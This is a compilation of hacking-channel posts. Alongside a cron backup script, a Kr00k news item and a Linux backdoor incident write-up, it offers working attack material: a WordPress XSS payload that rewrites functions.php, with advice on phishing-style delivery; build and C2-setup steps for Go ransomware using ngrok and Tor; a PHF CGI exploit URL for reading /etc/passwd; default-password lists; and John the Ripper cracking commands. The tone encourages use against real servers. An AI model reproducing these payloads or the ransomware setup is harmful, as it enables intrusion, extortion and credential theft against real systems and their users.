🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ The first platform in the world that collects and analyses every new hacking method.
+ AI practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 An example of a script to place in the root crontab of the main server
t.me/UndercOdeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

#time sync
0 5 * * 1 (/usr/bin/rdate -s YOUR_DATE_TIME_SERVER)

#backup gnats
6 3 * * * (cd /home; tar cf /home/backup/gnats.`date +\%w`.tar gnats)

#backup cvsroot
5 3 * * * (cd /home; tar cf /home/backup/cvsroot.`date +\%w`.tar cvsroot)

#backup apache
8 3 * * * (cd /home; tar cf /home/backup/apache.`date +\%w`.tar apache)

#gzip all backups
50 3 * * * (gzip -f /home/backup/*.tar)

#webalizer demo
3 5 * * * (/usr/local/bin/webalizer -c /home/apache/conf/webalizer.conf /home/apache/logs/`date -d yesterday +\%w`/access_log)

#remove last week's log
3 4 * * * (find /home/apache/logs/ -name access_log -mtime +6 -exec rm -f {} \;)

🦑 In this way the /home/backup directory holds a rotating set of 7 backups, one per weekday (note that % must be escaped as \% inside a crontab line). Then, by setting up cron on the secondary server, you can mirror the primary's /home/backup directory with the -m option of wget, or synchronise it with rsync. The last two entries use webalizer to produce the server's log statistics, with the Apache logs rotated by cronolog; please refer to the specific settings of those tools.
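The weekday rotation the crontab above relies on, as an added example that is not from the original post: a script cron can call with one command per directory, which writes the NAME.weekday.tar.gz archive, verifies it before reporting success, and counts how many of the 7 slots exist. It assumes tar, gzip and date are on PATH; the directory names in the usage are constructed.

```shell
# Added example (not from the original post): the weekday rotation the crontab
# above performs, as one command cron can call per directory.
# Assumptions: tar, gzip and date are on PATH; SRC_PARENT/NAME exists.

# weekly_backup SRC_PARENT NAME DEST
# Archives SRC_PARENT/NAME into DEST/NAME.<weekday>.tar.gz, where <weekday> is
# 0-6 as printed by `date +%w` (no \% escaping is needed here, because this
# runs inside a script rather than directly on a crontab line). The same slot
# is overwritten after seven days, so DEST never holds more than 7 copies per
# name. Prints the archive path on success; returns non-zero on any failure.
weekly_backup() {
    src_parent=$1; name=$2; dest=$3
    archive="$dest/$name.$(date +%w).tar"
    if [ ! -d "$src_parent/$name" ]; then
        echo "weekly_backup: no such directory $src_parent/$name" >&2
        return 1
    fi
    mkdir -p "$dest" || return 1
    # Run tar from the parent so the archive holds relative paths only.
    (cd "$src_parent" && tar cf "$archive" "$name") || return 1
    gzip -f "$archive" || return 1
    # Test the compressed archive before reporting success: a file truncated
    # by a full disk would otherwise be mirrored to the secondary as if good.
    gzip -t "$archive.gz" || return 1
    echo "$archive.gz"
}

# count_backups DEST NAME
# Number of rotation slots currently present for NAME (at most 7).
count_backups() {
    n=0
    for f in "$1"/"$2".[0-6].tar.gz; do
        [ -f "$f" ] && n=$((n + 1))
    done
    echo "$n"
}

# Usage from cron, one line per directory (constructed example):
#   6 3 * * * /usr/local/sbin/weekly_backup.sh /home gnats /home/backup
```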

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 AFTER THOSE TUTORIALS YOU ARE ABLE TO CONFIGURE ANY APACHE SERVER WITH A FULL UNDERSTANDING OF HOW IT WORKS
E N J O Y @UndercOdeTesting
🦑 No one has permission to clone UndercOde tutorials
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Kr00k Wi-Fi vulnerability exposed: billions of devices worldwide affected (CVE)
recently from Underc0de Tweets @UndercOdeTC

1) Wi-Fi chips manufactured by Cypress Semiconductor and Broadcom have a serious security vulnerability that leaves billions of devices around the world exposed, allowing an attacker to decrypt sensitive data from the wireless transmissions in range.

2) The vulnerability was made public at the RSA Security Conference that opened today. For Apple users, the issue was fixed in the iOS 13.2 and macOS 10.15.1 updates released in late October last year.

3) The security company ESET detailed the vulnerability at the RSA conference. Attackers can use the flaw, named Kr00k, to intercept and decrypt Wi-Fi network traffic. It exists in Wi-Fi chips from Cypress and Broadcom, two major vendors with large global market shares whose chips are used in everything from laptops and smartphones to access points and IoT devices.

4) Affected products include Amazon's Echo and Kindle, Apple's iPhone and iPad, Google's Pixel, Samsung's Galaxy series, the Raspberry Pi, and products from Xiaomi, Asus, Huawei and other brands. A conservative estimate is that one billion devices worldwide are affected.

5) After successfully exploiting the vulnerability, an attacker can intercept and analyse the wireless packets sent by the device. Ars Technica described it as follows:

6) Kr00k exploits a flaw that occurs when a wireless device disconnects from a wireless access point. If a client device or AP is attacked, it places all unsent data frames into the transmit buffer and then sends them over the air. Instead of encrypting this data with the session key negotiated during the normal connection, the vulnerable device uses a key consisting of all zeros, which makes decryption trivial.

7) The good news is that Kr00k only affects Wi-Fi connections encrypted with the WPA2-Personal or WPA2-Enterprise security protocols using AES-CCMP. This means that if you have a device with a Broadcom or Cypress Wi-Fi chipset, you can prevent the attack by using the latest Wi-Fi authentication protocol, WPA3.

8) According to ESET Research, which published the detailed information, the vulnerability was disclosed to Broadcom and Cypress along with other potentially affected parties, and device patches from most major manufacturers have already been released.


Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 XSS in WordPress: a full tutorial by UndercOde:
1) One of the most common vulnerabilities in WordPress plugins is cross site scripting – XSS for short. The basic premise of XSS is that an attacker is able to cause JavaScript to run in somebody else’s browser, while they’re on a website that the attacker shouldn’t be able to control.
2) By the end of this, you’ll have introduced a vulnerability, proven that it’s vulnerable
t.me/UndercOdeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Make your site vulnerable
(Tip: Probably best not to do this on a production site)
There are many ways to make your site vulnerable to XSS. But in the interest of brevity, we’ll choose the quickest and easiest way to do it. Create a new post on your WordPress site, as an admin user, switch the editor into Text mode, and add this and click publish:

<script>eval(window.location.hash.substring(1))</script>
Congratulations, your site is vulnerable to XSS.

2) Writing a malicious payload
We can do a lot of things. We could create a new user, we could delete all the posts, but today let’s do the worst thing possible and execute arbitrary code on the server.

> By default, WordPress lets you edit theme and plugin files. You absolutely should turn this off. Somebody with malicious intentions can do a lot of damage with it. As we’re about to find out…

3) You can edit the current theme’s functions.php file from /wp-admin/theme-editor.php?file=functions.php

4) Open up your devtools and execute this (no really, don’t do this on your production site!):

nc=document.querySelector('#newcontent');nc.value='<?php echo "HACK THE PLANET";phpinfo();exit()?>'+nc.value;nc.form.submit.click()
Ooh, that’s going to be annoying. We haven’t done too much damage though, so open up functions.php in your text editor and remove the defacement (i.e. replace the first line with <?php).

5) Now we have a proof of concept and a malicious payload we want to execute. We just need to put those pieces together, along with a little extra JavaScript to open that page in an iframe, and we’ll have something ready to do some damage…

6) Visit your vulnerable page, and add the following to the end of the URL (you may need to refresh after doing that):

#i=document.createElement('iframe');document.body.appendChild(i);i.src='/wp-admin/theme-editor.php?file=functions.php';window.setTimeout(function(){nc=i.contentDocument.querySelector('#newcontent');nc.value='<?php echo "HACK THE PLANET";phpinfo();exit()?>'+nc.value;nc.form.submit.click()},3000)
Now you’ve defaced your entire site just by following a link. If you can run arbitrary JavaScript on a WordPress site you can do virtually anything an admin user can do, including (by default) execute arbitrary PHP.

7) Delivery
To deliver your link you’ll need to use some social engineering.

Firstly, a URL shortener is handy – a bit.ly link might look suspicious, but less suspicious than a huge URL full of JavaScript.

You could make an email that looks exactly like a Facebook notification. You could even buy a domain name, set it up to redirect to the malicious URL, and rent a billboard outside their office. Get creative.

🦑 An exploit that does a bit of damage.

We learnt that if you can run alert(1) then you can probably run any JavaScript.

We’ve also learnt that by default, an XSS vulnerability in WordPress allows attackers to run arbitrary PHP code. This is why XSS in WordPress is particularly dangerous.

🦑 Proof of concept
I claimed that your site is vulnerable to XSS, but is it really? Don’t take my word for it, let’s prove it.

Visit the page you just created, and then add #alert(1) to the end of the URL. (You may need to refresh after doing that).

You should see an alert box saying "localhost says: 1" or just "1".

This is called a "proof of concept". We've proven that we can control the JavaScript running on this site without being admins.

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Ransomware updated tutorial:
t.me/UndercOdeTesting

🦑 Features:

1) Runs in the background (or not)

2) Encrypts files using AES-256-CTR (counter mode) with a random IV for each file.
Multithreaded.

3) RSA-4096 to secure the client/server communication.

4) Includes an unlocker.

5) Optional TOR proxy support.

6) Uses an AES-CTR cipher with stream encryption to avoid loading an entire file into memory.

7) Walks all drives by default.

8) Docker image for compilation.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Download the project outside your $GOPATH:

2) git clone github.com/mauri870/ransomware

3) cd ransomware
If you have Docker, skip to the next section.

4) You need Go 1.11.2 or later with $GOPATH/bin in your $PATH and $GOROOT pointing to your Go installation folder. For me:

export GOPATH=~/gopath
export PATH=$PATH:$GOPATH/bin
export GOROOT=/usr/local/go
Building the project requires a lot of steps, such as generating the RSA keys, building three binaries and embedding the manifest files, so let's let make do the job:

5) make deps
make

6) You can build the server for windows with make -e GOOS=windows.

πŸ¦‘ Docker

./build-docker.sh make

Config Parameters

7) You can change some of the configuration during compilation. Instead of running only make, you can set the following variables:

HIDDEN='-H windowsgui' # optional. If present the malware will run in background

USE_TOR=true # optional. If present the malware will download the Tor proxy and use it to contact the server

SERVER_HOST=mydomain.com # the domain used to connect to your server. localhost, 0.0.0.0, 127.0.0.1 works too if you run the server on the same machine as the malware

SERVER_PORT=8080 # the server port, if using a domain you can set this to 80

GOOS=linux # the target os to compile the server. Eg: darwin, linux, windows
Example:

make -e USE_TOR=true SERVER_HOST=mydomain.com SERVER_PORT=80 GOOS=darwin

The SERVER_ variables above apply only to the malware. The server has a --port flag that you can use to change the port it listens on.

DON'T RUN ransomware.exe ON YOUR PERSONAL MACHINE, EXECUTE IT ONLY IN A TEST ENVIRONMENT! I'm not responsible if you accidentally encrypt all of your disks!

🦑 How it works:

1) First of all, let's start our external domain:

ngrok http 8080
This command gives us a URL like http://2af7161c.ngrok.io. Keep this command running, otherwise the malware won't reach our server.

2) Let's compile the binaries (remember to replace the domain):

make -e SERVER_HOST=2af7161c.ngrok.io SERVER_PORT=80 USE_TOR=true
SERVER_PORT needs to be 80 in this case, since ngrok redirects 2af7161c.ngrok.io:80 to your local server port 8080.

3) After the build, binaries called ransomware.exe and unlocker.exe, along with a folder called server, are generated in the bin folder. Execution of ransomware.exe and unlocker.exe (even if you use a different GOOS variable during compilation) is locked to Windows machines only.

4) Enter the server directory from another terminal and start it:

cd bin/server && ./server --port 8080

5) To make sure that all is working correctly, make a http request to http://2af7161c.ngrok.io:

curl http://2af7161c.ngrok.io
If you see OK and some logs in the server output, you are ready to go.

6) Now move ransomware.exe and unlocker.exe to the VM along with some dummy files to test the malware. You can take a look at cmd/common.go to see some configuration options such as the file extensions to match, directories to scan, skipped folders and the maximum size of a file to match, among others.

Then simply run ransomware.exe and watch the magic happen.

🦑 I post this ransomware tutorial from his git link for learning, not for harm.

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Detailed hack into a Linux server, part 1 (plan)
> Cracking the password

1) In the UNIX operating system, the passwords of all system users are stored in one file, kept in the /etc directory and called passwd.

2) If the reader thinks that all that needs to be done is to get this file and log in to the system with the passwords in it, that is quite wrong. The passwd file under UNIX and Linux is special.

3) The passwords of all accounts in it have been encrypted (with the DES-based method mentioned earlier), and the encryption is one-way, which means there is no way to decrypt them.

4) Nevertheless, there are programs that can recover the original passwords. The author recommends the cracking program "Cracker Jack", which works by exhaustively trying the words in a dictionary file.

5) "Cracker Jack" encrypts each entry in the dictionary file and then compares the result with the contents of the password file.

6) If the same result is obtained, the corresponding unencrypted password is reported. The software neatly sidesteps the fact that the passwords cannot be decrypted by relying on exhaustive comparison. There are many tools that obtain passwords on this principle, and readers can find them on the Internet.
t.me/UndercOdeTesting

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Detailed hack into a Linux server, part 2: starting the attack
t.me/UndercOdeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Getting the password file
This is the most difficult part. Obviously, if the administrator has such a password file, he will certainly not leave it where others can get it comfortably.
> John the Ripper can be used as well; see the next tutorial for how to use it.

2) The intruder must find a good way to get the password file without entering the system. Here the author introduces two methods; you can try them, and they may succeed.

> 1. The /etc directory is often not locked down on the FTP service. The intruder can use an FTP client program to log in with the anonymous account and then check whether /etc/passwd is set to be readable anonymously.

3) If a copy is there, take it immediately and run it through the cracking software.

4) On some systems there is a program called PHF in the /cgi-bin directory. It is very convenient if it exists on the server being attacked, because PHF lets users read files on the web server remotely; based on this, a browser can be used to grab the passwd file simply by typing the following URL into the address bar: http://xxx. xxx .xxx / cgi-bin / phf? Qalias = x% 0a / bin / cat% 20 / etc / passwd , where xxx.xxx.xxx is the name of the site being attacked.

5) If neither of these methods works, the intruder must turn to other methods.

> In some cases the second field of the password file found by the intruder is x, ! or *; then the password file is locked, which is one of the methods system administrators use to strengthen security.

6) However, it is rare for the password file to be completely hidden. Under normal circumstances an unlocked copy of the password file is backed up somewhere on the system, and intruders can make use of it.
> For example, the intruder usually looks in /etc/shadow or a similar location to see if a backup of the password file can be found.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Let's hack the Linux server, part 3 (after cracking the login password)
fb.com/UndercOdeTestingCompany

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Let's establish our own shell account

After the two or three key steps above, the intruder finally has the crucial password file and has cracked the passwords. Now you can run the TELNET program and log in to the host.

2) When you connect, the server shows some information, usually the system type: UNIX, Linux, AIX, IRIX, Ultrix, BSD or even DOS and VAX/VMS; then the Login prompt appears on the screen, and you can log in to the system with the obtained account and password. At this point the intruder can use his UNIX knowledge to do whatever he likes.

3) Finally, let's analyse a password file. The file content is as follows:
root:1234aaab:0:1:Operator:/:/bin/csh
nobody:*:12345:12345::/:
daemon:*:1:1::/:
sys:*:2:2::/:/bin/csh
sun:123456hhh:0:1:Operator:/:/bin/csh
bin:*:3:3::/bin:
uucp:*:4:8::/var/spool/uucppublic:
news:*:6:6::/var/spool/news:/bin/csh
audit:*:9:9::/etc/security/audit:/bin/csh
sync::1:1::/:/bin/sync
sysdiag:*:0:1:Old System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag
tom:456lll45uu:100:20::/home/tom:/bin/csh
john:456fff76Sl:101:20:john:/home/john:/bin/csh
henry:AusTs45Yus:102:20:henry:/home/henry:/bin/csh
harry:SyduSrd5sY:103:20:Harry:/Home/Harry:/bin/csh
Steven:GEs45Yds5Ry:104:20:Steven:/Home/Steven:/bin/csh
+::0:0:::

4) The ":" character separates the fields. For example, tom:456lll45uu:100:20:tomchang:/home/tom:/bin/csh means:
User name: tom
Password: 456lll45uu
User number (UID): 100
Group number (GID): 20
Real name: tom chang
Home dir: /home/tom
Shell: /bin/csh

5) Readers will notice that the password fields of accounts such as nobody, daemon, sys, bin, uucp, news, audit, sysdiag and sundiag contain *, which means these accounts are locked and cannot be used directly.

6) It is worth noting that many systems have some default accounts and passwords after the first installation, which is convenient for opportunistic hackers. Here are some default accounts and passwords under UNIX.
ACCOUNT      PASSWORD
-----------  ----------------
root         root
sys          sys / system / bin
bin          sys / bin
mountfsys    mountfsys
adm          adm
uucp         uucp
nuucp        anon
anon         anon
user         user
games        games
install      install
reboot       (for "command login" use)
demo         demo
umountfsys   umountfsys
sync         sync
admin        admin
guest        guest
daemon       daemon

7) Of these, root, mountfsys, umountfsys and install (sometimes also sync) are root-level accounts, that is, they have sysop (system administrator) permissions.
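An audit of a passwd-format file, as an added example that is not part of the original post: it reports the conditions the walk-through above describes (accounts with UID 0 whatever their name, locked and empty password fields, a real hash left in the world-readable file, the NIS "+" entry) and flags any of the vendor default account names from the table that are not locked, so their passwords can be verified as changed. It assumes the classic seven-field layout shown above; the sample file in the usage is constructed.

```shell
# Added example (not from the original post): audit a passwd-format file for
# the conditions described above. Assumption: classic 7-field layout with the
# hash (or a lock marker) in field 2, as in the sample file shown on the page.

# audit_passwd FILE
# Prints one finding per line as "<kind> <user>", where kind is:
#   uid0    - the account has UID 0 (root privileges), whatever its name
#   nopass  - the password field is empty, so no password is needed to log in
#   locked  - the field is a lock marker (*, !, x, or starts with one); x means
#             the hash lives in /etc/shadow, so it cannot be used directly
#   hash    - a real hash sits in the world-readable file (crackable offline)
#   nis     - a "+" or "-" entry, which pulls accounts in from NIS
#   default - the name is a vendor default account from the table above and is
#             not locked, so its password should be confirmed as changed
audit_passwd() {
    awk -F: '
    BEGIN {
        split("root sys bin mountfsys adm uucp nuucp anon user games install reboot demo umountfsys sync admin guest daemon", d, " ")
        for (i in d) defaults[d[i]] = 1
    }
    /^[[:space:]]*$/ { next }
    {
        user = $1; pw = $2; uid = $3
        if (user ~ /^[+-]/) { print "nis", user; next }
        if (uid == 0) print "uid0", user
        if (pw == "") print "nopass", user
        else if (pw ~ /^[*!x]/) print "locked", user
        else print "hash", user
        if ((user in defaults) && pw !~ /^[*!x]/) print "default", user
    }' "$1"
}

# Usage (constructed sample): audit_passwd /path/to/passwd
# On the sample above this flags "sun" as uid0 with a live hash: a second
# root-level account hiding under an innocuous name.
```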

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Now, after cracking a Linux server, let's analyse the log files:
fb.com/UndercOdeTestingCompany

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) First it is necessary to introduce the UNIX log files. Many intruders do not want the hacked computer to be able to trace them; how do they manage that?

2) The system administrator relies mainly on the system's LOG, commonly called the log files, to find traces of the intrusion and the intruder's IP address and other information. Of course, some administrators use third-party tools to record information about intrusions. Here we mainly talk about the files that record intrusion traces on a typical UNIX system.

3) There are several versions of UNIX, and each has different LOG files, but most keep them in roughly the same places. The most common locations are the following:
/usr/adm, on earlier versions of UNIX;
/var/adm, used by newer versions;
/var/log, used by some versions of Solaris, Linux, BSD and FreeBSD;
/etc, where most UNIX versions put utmp and some also put wtmp; this is also the location of syslog.conf.

4) The functions of some of the files are listed below; of course, they also differ between the systems being invaded.

> acct or pacct, which records the commands run by each user;
access_log, used mainly when running NCSA HTTPD on the server; this log records which sites connected to your server;
aculog, which holds the record of MODEM dial-outs;
lastlog, which records each user's most recent login and where they came from, and sometimes the last unsuccessful login;
loginlog, which records abnormal login attempts;
messages, which records output sent to the system console; other information in it is generated by syslog;
security, which records attempts to use the UUCP system to enter restricted areas;

> sulog, which records use of the su command;
utmp, which records all users currently logged in to the system; this file changes constantly as users enter and leave the system;
utmpx, an extension of utmp;
wtmp, which records user login and logout events;
syslog, the most important log file, produced by the syslogd daemon.

🦑 Log information sources:

1) /dev/log, a UNIX domain socket that accepts messages generated by processes running on the local machine;

2) /dev/klog, a device that receives messages from the UNIX kernel;
port 514, an Internet socket that accepts syslog messages generated by other machines via UDP;

3) uucp, the recorded UUCP information, which is updated by local UUCP activity and can also be modified by actions initiated by remote sites. The information includes calls made and accepted, requests made, the sender, the sending time and the sending host;

4) lpd-errs, a log for printer fault information;
the ftp log, obtained by running ftpd with the -l option;
the httpd log, in which the HTTPD server records each web access;
the history log, which keeps a record of the commands the user recently typed;
vold.log, which records errors encountered when using removable media.

5) The above introduces the main steps of hacking a server, and the reader should now have some basic knowledge of it. It must be emphasised again that without knowledge of the UNIX system it is absolutely impossible to master this.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to use John the Ripper in full: crack anything with your Windows or Linux:
twitter.com/UndercOdeTC

1) Download from https://www.openwall.com/john/ (official)

2) Let's try it on any Windows 10

From cmd, go to the folder: cd <folder name... >

3) Run .\john.exe

4) The command below tells JtR to try "single" mode, then the default wordlist containing likely passwords, and then "incremental" mode.

.\john.exe passwordfile

5) Choose your wordlist and run:
.\john.exe passwordfile --wordlist="wordlist.txt"

6) If you want to specify a cracking mode, use the exact parameter for that mode.

.\john.exe --single passwordfile
.\john.exe --incremental passwordfile

7) Adding rules to the cracking mode:

.\john.exe --wordlist="wordlist.txt" --rules passwordfile

8) To see the results:

.\john.exe --show passwordfile

9) If you want to see whether you cracked any root users (UID=0), use the --users parameter.

.\john.exe --show --users=0 passwordfile

10) Well, you can start cracking now.

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Well done. After those Underc0de tutorials you are able to crack any Linux OS, to get control or...
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to know if your Linux is hacked?
The experience of a Linux server being hacked and deleted. I. Background, full tutorial:
t.me/UndercOdeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) In the evening I saw a server with very high traffic, obviously not the same as usual: it reached 800 Mbps. My first impression was a Trojan horse, with the machine being used as a zombie (a "broiler").

2) For the best performance of our server the host firewall (iptables) is not turned on, but there is a physical firewall in front of the server, and the machine is reached through port mapping on an uncommon port. In theory it should have been fully secure, yet it recently picked up a Trojan. It has kept me busy, so I take this opportunity to record the discovery process.

3) Find and track

a) View the traffic graph and find the problem

Web pages were very slow to load, and sometimes did not respond at all.

b) Use top to view processes dynamically

I immediately logged in remotely to the server with the problem. The remote session was very laggy and the traffic on the network card was very high. Through top I found an abnormal process taking up a lot of resources. I did not look closely at the name and thought it was a web service process.

c) Use ps to view the path of the process

I found the program file under the /etc directory; it is a binary program. I copied it and put it near this article for everyone to study in a virtual machine, haha.

d) End the abnormal process and continue tracking

killall -9 nginx1

rm -f /etc/nginx1
After killing the process the traffic immediately came down and the remote session was no longer blocked. Having deleted the program file and killed the abnormal process, is the job done? It is certainly not that simple. This is a Trojan, and it can regenerate its program file by itself (as expected, it did regenerate later, before I had worked everything out), so we have to keep tracking.

e) View the login records and the secure log file

Run the last command to view account login records: everything was normal. Checking the system log messages found nothing, but when I checked the secure file I found some abnormal entries. They were related to authentication, so the attacker was presumably trying to connect in order to control the machine and send packets.

f) Check the processes again with ps

In fact the problem was already there during the first ps, but it was not noticed then. The second time I studied each process one by one, looking for anything less than normal, and found a strange ps process.

g) I found a normal machine and checked the size of the ps command. The normal size is about 81 KB, while the ps on this machine is as large as 1.2 MB. The command file must have been replaced.

h) Then I went into the directory of the other ps and saw the following commands. I checked these commands on the system and found that they had all become very large, all 1.2 MB. These system command files must all have been replaced.

🦑 1) More abnormal files found

Looking at the crontab for scheduled tasks, I found nothing. Then I looked at the system startup file rc.local, and there was nothing abnormal either. Then I went into the /etc/init.d directory and saw the strange script files DbSecuritySpt and selinux.

2) The first file can be seen to start the abnormal file. The second one should be related to login; I don't know the specifics, but there is certainly a problem.

3) Since it is related to login, find the files related to ssh. I found the following file, which is hidden. This is also a Trojan file. Let's note first that the program names closely resemble our service names. Both are 1.2 MB in size and may be the same file.

4) I took a look at the /tmp directory, where Trojans like to appear, and also found abnormal files. From the name it looked like a monitoring component of the Trojan.
5) Thinking this far, there are probably many replaced commands. We cannot solve it by ourselves alone. My suggestion is to reinstall the operating system and set up good security policies.

> Clearing the Trojan manually

🦑 The general steps are summarised as follows:

1) Make a simple judgement that it is a Trojan

2) Upload the following commands to /root

ps netstat ss lsof
3) Delete the following directories and files

4) Find the abnormal programs and kill them

5) Remove the commands containing the Trojan and reinstall them (or copy over the normal programs uploaded earlier)

It seems that reinstalling by myself does not work; I am looking for a normal machine to copy the commands from.
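The two checks the investigation above did by hand (comparing the ps binary against a clean machine, and looking through /etc/init.d for unfamiliar scripts), as an added example that is not part of the original write-up. It assumes sha256sum is available and that a baseline of hashes was recorded from a clean machine of the same build; the baseline file, tool directory and init.d directory are parameters (constructed in the usage) so it can be pointed at a mounted image rather than the live root, and it should be run with known-clean copies of the tools, since the system's own ps, netstat, ss and lsof are exactly what was replaced.

```shell
# Added example (not from the original write-up): script the two manual checks
# described above. Assumptions: sha256sum is on PATH; BASELINE holds lines of
# "<sha256> <tool name>" recorded from a clean machine of the same build.

# check_binaries BASELINE BIN_DIR
# Recomputes the hash of every tool named in BASELINE under BIN_DIR and prints
# "REPLACED <name> <size-in-bytes>" for each mismatch (a 1.2 MB ps where about
# 81 KB is expected, as above, shows up here) or "MISSING <name>" if the tool
# is gone. Prints nothing when everything matches.
check_binaries() {
    baseline=$1; bindir=$2
    while read -r want name; do
        [ -n "$name" ] || continue
        path="$bindir/$name"
        if [ ! -f "$path" ]; then
            echo "MISSING $name"
            continue
        fi
        have=$(sha256sum "$path" | cut -d' ' -f1)
        if [ "$have" != "$want" ]; then
            echo "REPLACED $name $(wc -c < "$path" | tr -d ' ')"
        fi
    done < "$baseline"
}

# unknown_init_scripts INIT_DIR EXPECTED
# Lists entries in INIT_DIR whose names are not in EXPECTED (one name per
# line); a dropped-in script such as DbSecuritySpt above only becomes visible
# when compared against what the build is supposed to contain.
unknown_init_scripts() {
    initdir=$1; expected=$2
    for f in "$initdir"/*; do
        [ -e "$f" ] || continue
        n=$(basename "$f")
        grep -qx -- "$n" "$expected" || echo "UNKNOWN $n"
    done
}

# Usage (constructed paths): run from a clean toolset, e.g. a rescue CD
#   check_binaries /root/baseline.sha256 /mnt/root/bin
#   unknown_init_scripts /mnt/root/etc/init.d /root/expected-initd.txt
```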

🦑 Scanning with antivirus tools

1) Install the anti-virus tool clamav

2) Start the service

service clamd restart
3) Update the virus database

Since this ClamAV is not the latest version, there is an alert message. You can ignore it or upgrade to the latest version.

4) Scanning method

You can use clamscan -h to view the corresponding help information.

5) Check the log for findings

Delete the commands found and replace them with normal ones.

> Appendix: Linux.BackDoor.Gates.5

After looking up the information, this Trojan should be Linux.BackDoor.Gates.5. I found a file whose content is as follows:

6) Some users have the deep-rooted idea that no malware can actually threaten the Linux kernel operating system, but this idea faces increasing challenges.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How exactly to locate the Trojan process?
twitter.com/UndercOdeTC

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Described here is a Trojan from the malware family Linux.BackDoor.Gates: Linux.BackDoor.Gates.5.

2) This malware combines the functionality of a traditional backdoor and a DDoS attack Trojan and infects 32-bit Linux versions. From its characteristics it can be concluded that it comes from the same virus writer as the Linux.DnsAmp and Linux.DDoS family Trojans.

3) The new Trojan consists of two functional modules: the basic module is a backdoor capable of executing instructions issued by the criminals, and the second module is saved to the hard disk during installation for DDoS attacks. While running, Linux.BackDoor.Gates.5 collects the following information about the infected computer and forwards it to the criminals:

> Number of CPU cores (read from /proc/cpuinfo).

CPU speed (read from /proc/cpuinfo).

CPU usage (read from /proc/stat).

Gate's IP (read from /proc/net/route).

Gate's MAC address (read from /proc/net/arp).

Network interface information (read from /proc/net/dev).

MAC address of the network device.

Memory (using the MemTotal parameter in /proc/meminfo).

The amount of data sent and received (read from /proc/net/dev).

Operating system name and version (by calling the uname command).

After starting, Linux.BackDoor.Gates.5 checks the path of its startup folder and implements one of four behaviour modes based on the result of the check.

🦑 If the path of the backdoor's executable file differs from the paths of the netstat, lsof and ps tools, the Trojan starts in the system disguised as a daemon, then initialises itself, decompressing its configuration file during initialisation. The configuration file contains the various data the Trojan needs to run, such as the management server's IP address and port, and the backdoor installation parameters.

> Depending on the value of the g_iGatsIsFx parameter in the configuration file, the Trojan either actively connects to the management server or waits for a connection. After successful installation, the backdoor detects the IP address of the site it is connected to and then uses that site as its command server.

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁